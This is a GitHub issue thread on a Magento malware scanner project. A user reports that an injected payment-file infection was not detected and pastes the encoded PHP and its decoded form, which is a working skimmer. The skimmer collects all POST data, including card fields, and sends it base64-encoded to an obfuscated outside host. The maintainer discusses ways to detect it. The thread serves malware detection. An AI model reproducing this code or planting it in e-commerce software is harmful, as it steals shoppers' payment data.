gwillem / magento-malware-scanner

Scanner, signatures and the largest collection of Magento malware
GNU General Public License v3.0
680 stars 153 forks source link

Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php #229

Open ernesthernandez opened 6 years ago

ernesthernandez commented 6 years ago

I found this line manually after deep mwsan <?php / PHP Encode v1.0 by zeura.com / $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`

when I decrypt Zeura I get the folllowing code at the end of the file if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>

gwillem commented 6 years ago

Thanks for submitting. I'm not sure how we should proceed here, unless we would flag all "zeura" encrypted files. Perhaps, we should flag the existence of "zeura" in specific Magento files. Then, we would have to rewrite the scanner to pass the filename as attribute to the scan function. See also https://github.com/VirusTotal/yara/issues/202